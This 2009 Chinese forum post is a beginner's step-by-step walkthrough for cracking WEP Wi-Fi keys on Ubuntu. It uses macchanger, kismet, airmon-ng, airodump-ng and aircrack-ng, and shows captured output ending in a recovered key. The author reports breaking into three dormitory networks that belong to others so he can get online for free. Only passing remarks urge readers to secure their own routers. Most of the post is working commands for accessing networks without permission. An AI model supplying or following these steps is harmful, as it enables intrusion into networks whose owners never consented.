|
|
本本:SONY VGN-FW35,内置intel 5100AGN无线网卡。
系统: Ubuntu 9.04. 镜像很好弄, baidu一下就可以找到。 + 笔记本自带的vista home basic(强力阉割版:@)
为了表示对longas版主及yhoqi管理员感谢,先将我参考的帖子链接放在这里,不懂的地方去看他们的帖子咯~要是还不懂就不是我没说清楚了,是他们没说清咯,哈哈~
[原创]BackTrack2下破解WEP加密实战讲解,欢迎讨论
http://www.anywlan.com/bbs/thread-5876-1-1.html
[分享]Ubuntu进行无线破解实例
http://www.anywlan.com/bbs/thread-27418-1-1.htm
前言~(心急的请跳过,直接看过程)
前段时间想换换操作系统玩玩,因为vista用起来感觉很不爽。了解到ubuntu是网民中使用率最高(?)的一种Linux系统,于是上网下了一套开始折腾,几种安装方法都试过了,连vista都被顺便搞挂了几次,在经历了几次重装(菜鸟必杀技)之后,终于能感受到ubuntu的优点了。另外,我也在了解怎么破解Wifi网络,因为住的地方上网不是很方便,仅想 ceng网而已,能看看网页、收发下邮件就OK)。
主要的问题是新的OS带来的,不知道怎么安装文件, 不知道怎么运行程序等等。 折腾了几天, 刚弄明白不久,在参考了论坛几位大老的经典贴之后,居然顺利破解了宿舍楼里能收到的3个无限网络(全是WEP加密,信道默认为6)。小小的欣喜之后,不禁很忧虑,这那里有网络安全可言?!想想以前自己为了图方便,路由器的各种密码能默认就默认, 能简单就简单,岂不是真成了脱了衣的日本AV女优?不禁狂寒~~随立马改路由器登录密码,改无线网络加密方式。也能初步理解为什么高手们不愿意将新的破解技术释放出来了,但是反过来说,只有群众们的破解水平都提高了,大家的安全意识也才会提高。
好了,闲话就说到这里。下面描述下过程,高手们别砸砖,仅仅是觉得从论坛中获取了很多知识,现在想把自己的心得和还没有实现这种最初级WEP破解的新手们一起分享一下。。。莫要压迫额~~~呵呵
过程~(命令不含引号“)
1. 确保已安装Ubuntu提供的更新(台湾源,网通的用这个确实快),且可以利用内置无线网卡正常上网。(避免未知的问题,因为我菜)
2. 下载几个常用的软件, 在root下,直接用“apt-get install 软件名“这个命令就可以得到aircrack-ng, macchanger, kismet等软件, 很方便。
3. 打开 应用程序-》附件-》终端。
4. 输入"ifconfig -a"查看网卡的信息。5100AGN在这里被显示为 wlan0。
5. 不需要加载内置网卡的驱动就能用,即不用输入 "ifconfig -a wlan0 up"。(原因估计是系统已经加载了吧?因为可用。不太清楚)
6. 打开一个终端,输入"macchanger -m 00:11:22:33:44:55"。00:11:22:33:44:55是随意指定的,前两位是00就行。该命令想起作用需要先关闭无线网卡, 我直接关掉机身上无线网卡的快捷键,然后修改成功后再打开就行了,好像也可以用down命令吧,应该跟5中的up命令相反用就行吧,还没试过,小心。
6. 利用kismet查看存在的无线网络,在使用前需要先配置这个软件,请在坛子里搜索中查,主要是修改source=none,none,none,由于芯片未知我就填了个别人用的,也能启动。
7. 另开一个终端,输入"airmon-ng start wlan0 6"。命令的解释请参看longas版主的帖子。在破解全部完成时,可以利用"iwconfig"命令查看wlan0的状态以及有几个mon,再用"airmon-ng stop wlan0"关闭monitor,此处wlan0可以换成是mon0,mon1等, 根据iwconfig的结果来。不这样不能再上无线网络。
8. 输入"airodump-ng -w ciw.cap --channel 6 wlan0"开始抓包。我这里命令一输入就见packets狂飙,才几分钟就到6W多了。。。。。。。所以ArpRequest等攻击方式我就没有尝试了,等以后抓包很慢时再试试,每个网都有两个左右的用户,晚上9点可能大家上网正上的欢呢,就方便我抓包了,呵呵。
9. 另开终端,输入"ls",查看ciw.cap具体被保存成什么名字了, 我这里是ciw.cap-02.cap。大家根据自己的来把。
——————————————————————————————————————————————————————————
chop.cap-01.csv ciw.cap-01.kismet.netxml 视频
chop.cap-01.ivs ciw.cap-02.cap 图片
chop.cap-01.kismet.csv ciw.cap-02.csv 文档
chop.cap-01.kismet.netxml ciw.cap-02.kismet.csv 音乐
ciw.cap-01.csv ciw.cap-02.kismet.netxml 桌面
ciw.cap-01.ivs 公共的
ciw.cap-01.kismet.csv 模板
——————————————————————————————————————————————————————————
10. 终端中输入"aircrack-ng -x -f 2 ciw.cap-02.cap"。
————————————————————————————————————————————————————————————————————————
[email=root@ubuntu]root@ubuntu[/email]:~# aircrack-ng -x -f 2 ciw.cap-02.cap
Opening ciw.cap-02.cap
Read 49***17 packets.
# BSSID ESSID Encryption
1 00:**:**:**:**:** ***** WEP (43***59 IVs)
2 00:**:**:**:**:** TP-LINK_****** WEP (67***59 IVs)
3 00:**:**:**:**:** **** WEP (11***51 IVs)
4 00:**:**:**:**:** **#** No data - WEP or WPA
5 02:**:**:**:**:** Unknown
Index number of target network ?
——————————————————————————————————————————————————————————————————————————
具体Mac地址和ESSID用*号代替了,希望大家理解。选择要破解的网络即可,由于有三个网络,所以该命令我运行了三次,结果都破解了。。。。。
————————————————————————————————————————————————————————————
Aircrack-ng 1.0 rc3
[00:00:03] Tested 59***97 keys (got 144 IVs)
KB depth byte(vote)
0 111/112 FE( 256) 03( 0) 04( 0) 05( 0)
1 6/ 9 C2( 768) 24( 512) 25( 512) 27( 512)
2 5/ 6 B9( 768) 04( 512) 0D( 512) 2B( 512)
3 7/ 3 DB( 768) 0D( 512) 19( 512) 21( 512)
4 23/ 4 D3( 512) 02( 256) 05( 256) 07( 256)
KEY FOUND! [ 12:34:56:78:90 ]
Decrypted correctly: 100%
————————————————————————————————————————————————————————————
多么可怕的密码啊。。。。。水友们,不知道看帖的你有多少是这样的密码呢?还有一个是用生日作密码,另外一个估计是用自己的QQ号改的。。。。。。都是10位。估计他们的路由器密码也还是默认的。。。admin。。。。哎~
11. 记录下密码,关闭终端,如果不能上网了,请看第7条。
有错的地方请朋友们提醒, 我好及时修改。祝大家心想事成~破解wep密码,ceng网就行,莫搞破坏哦~呵呵
PS: 有不懂的多搜索以前的帖子,问题可能就会解决了,我是在论坛首页中的Baidu搜索一栏中搜索的,这样就没有时间限制了,很方便。链接在这里:http://www.baidu.com/s?tn=anywlan_pg&;ct=2097152&si=www.anywlan.com&ie=gb2312&bs=11&sr=&z=&cl=3&f=8&wd=hello&s=1&sts=www.anywlan.com |
|
发表于 2009-9-26 07:53:58